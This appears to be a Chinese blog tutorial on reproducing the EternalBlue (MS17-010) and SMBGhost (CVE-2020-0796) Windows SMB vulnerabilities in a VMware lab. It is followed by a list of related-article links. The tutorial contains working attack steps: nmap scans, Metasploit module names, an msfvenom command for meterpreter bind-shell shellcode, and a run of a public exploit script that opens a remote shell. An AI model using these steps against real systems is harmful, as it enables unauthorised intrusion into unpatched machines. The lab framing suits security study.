一、永恒之蓝

1.简介
2017年3月14日,微软公布SMB远程代码执行漏洞(MS17-010),又称永恒之蓝,该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

2.详细信息

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010?redirectedfrom=MSDN
https://paper.seebug.org/1164/#0x00 ```

3.漏洞复现
(1)环境搭建
系统镜像:私信我,博客发不了百度云链接。
kali镜像:官网链接:

https://mirror.karneval.cz/pub/linux/kali-images/kali-2020.2/kali-linux-2020.2-installer-amd64.iso

vmware:官网下载:

https://www.vmware.com/cn/products/workstation-player/workstation-player-evaluation.html

直接打开后关闭更新、关闭防火墙、kali和win7都配置成网络配置成NAT模式。保证在同一网段内。
(2)进行扫描
先确定目标,用nmap进行ping扫描

nmap -sP 192.168.48.0/24

其中2是网关、254是VMware的DHCP服务器、132是自己,所以win7的IP地址是192.168.48.157
用nmap检测445端口有没有开

(3)使用msf的ms17-010进行攻击

查询ms17-010模块、用auxiliary/scanner/smb/smb_ms17_010查看有没有漏洞


查看选项并设定目标主机

使用exploit/windows/smb/ms17_010_eternalblue模块进行攻击,和上边一样设定目标主机然后运行

查看系统信息、进入shell

其他命令参照:https://blog.csdn.net/wy_97/article/details/78838252

二、永恒之黑

1.简介
微软发布安全公告披露了一个最新的SMB远程代码执行漏洞(CVE-2020-0796),攻击者利用该漏洞无须权限即可实现远程代码执行,一旦被成功利用,其危害不亚于永恒之蓝,全球10万台服务器或成首轮攻击目标。SMB(Server Message Block)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台。由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,受黑客攻击的目标系统只要开机在线即可能被入侵。据了解,凡政府机构、企事业单位网络中采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。

2.漏洞原理

bash https://paper.seebug.org/1164/#0x00

3.漏洞复现
(1)环境搭建
系统镜像:

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

检测工具和poc:

https://download.csdn.net/download/qq_28241709/12715049

安装win10,内存尽量给大些,先不加网卡、

选我没有internet

选否
装完成进入操作系统,打开文件资源管理器,右键此电脑点击管理,进入本地用户和组,解开Administrator用户并设置密码

设置完成后用administrator账户登录

禁用防火墙和系统更新,和关闭杀毒管家、网络流量管家等防护工具

添加网卡,设置为NAT和kali在同一网段

(2)获取权限
扫描阶段同永恒之蓝。
使用python脚本测试Windows 10是否存在漏洞

vulnerble:易受攻击的,表示有漏洞
Kali Linux实操进行反弹shell
root用户登录(默认不能登录,需要给root设置密码后才能登录):
普通用户登录后,sudo passwd root 给root设置密码,成功后重启kali,便能使用root登录!
下载SMBGhost_RCE_PoC-master.zip
解压,进入目录

首先使用msfvenom生成一个python类型的shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python


将输出的内容复制,拷贝到exploit.py中,剪切替换原先的USER_PAYLOAD部分,

启动msf控制端设置有效载荷并开启4444端口监听
msfconsole

(1)use exploit/multi/handler
(2)set payload windows/x64/meterpreter/bind_tcp
(3)set lport 4444
(4)set rhost 192.168.48.151     (Win10的IP地址)
(5)run

重点来了
先执行 chmod +x exploit
再执行python3 exploit.py -ip 192.168.48.151
(一定要使用python3,使用默认python会100%蓝屏)

提示有session 1 opened
注意:如果没有session 1 opened提示,可以退出监听(ctrl+c)重新run一下再次监听,直到成功为止!
执行shell,回车,输入ipconfig,可以看到是192.168.48.151。到这里就成功拿到shell了
有问题可以私信我,有些文件涉及版权不能发布。

09永恒之蓝与永恒之黑的复现相关推荐

  1. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

  2. Windows下永恒之蓝(MS17-010)漏洞的复现分析

    一.漏洞简介 1.爆发于17年左右,一种名为WannaCry(永恒之蓝)的电脑勒索病毒,基于SMB协议,利用开放TCP445端口的机器进行攻击,只要机主开机联网,就可通过漏洞来控制主机,植入木马,窃取 ...

  3. MS17-010(永恒之蓝)漏洞分析与复现

    文章目录 一.漏洞简介 1.永恒之蓝介绍: 2.漏洞原理: 3.影响版本: 二.漏洞复现 复现环境: 复现过程: 1.主机发现: 2.使用MSF的永恒之蓝漏洞模块 3.使用ms17-010扫描模块,对 ...

  4. 永恒之蓝ms17_010漏洞利用攻击

    文章目录 前言 一:基础知识介绍 二.实验环境 三.实验步骤 总结 前言 学习Metasploit的时候就听说了经典的永恒之蓝漏洞,所以自己试验了一次,借此作个记录. 一:基础知识介绍 1.何为永恒之 ...

  5. 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...

  6. 永恒之蓝漏洞复现测试

    永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...

  7. 使用ms17-010永恒之蓝漏洞渗透win7系统

    实验环境 kali :192.168.249.130 win7 :192.168.249.128 1.永恒之蓝介绍: 永恒之蓝漏洞(MS17-010)通过 TCP 的445和139端口,来利用 SMB ...

  8. 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 一. 什么是永恒之蓝? - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Window ...

  9. Windows下的MS17-010(永恒之蓝)漏洞分析与复现

    目录 一.漏洞简介 1.永恒之蓝: 2.漏洞原理: 3.影响版本: 二.复现环境 三.漏洞复现 1.使用kali自带的nmap对靶机进行端口扫描,扫描到445端口处于开放状态 2.启动kali自带的m ...

最新文章

  1. asp.net用url重写URLReWriter实现任意二级域名 (转)
  2. GMQ发行稳定币将进一步打破稳定币市场垄断格局
  3. MyBatis学习 之 二、SQL语句映射文件(1)resultMap
  4. 实战经验:从内存故障到CPU过高诊断-直播预告
  5. 教育启蒙赛道、亿级异构数据不停服平滑迁移方案和实践
  6. 6.输入四个数,找出最大值方法二
  7. 【PHP设计模式 08_CeLue.php】策略模式
  8. 汇编画图题:存储器扩展(重要)
  9. 终极版Servlet——我只能提示您路过别错过
  10. L1-021 重要的话说三遍 (5 分) — 团体程序设计天梯赛
  11. 【Eclipse使用教程】最全的Eclipse快捷键
  12. 安装office简繁转换增益集
  13. 大数据“超能力”:数据安全和隐私该如何保障?
  14. 自定义Android工程的out目录
  15. mysql dual表用法_mysql dual表的用途及案例
  16. js保留2位小数(且四舍五入)
  17. 68 个 Python 内置函数详解
  18. 用python制作相册影集_影集制作APP哪个好?就用这些APP把照片做成相册!
  19. 【css设置滚动条粗细】
  20. 计算机考csp200分啥水平,信息学竞赛CSP诞生多位满分选手,小码王学员包揽多个组别省市第一...

热门文章

  1. 炬源繁荣气化炉炸酱面
  2. microsoft edge 打开垃圾网页
  3. 网站用户行为数据收集和分析方法
  4. 一图看懂,阿里云飞天企业版如何支持政企数智创新
  5. 黑客可入侵自动洗车系统暴力攻击驾驶人
  6. 2 Keil自带的8051汇编boot源码解析注释
  7. 端口扫描详解(kali linux)
  8. A_A02_003 ST-LINK驱动安装
  9. jsp格式date类型
  10. linux没有写的权限问题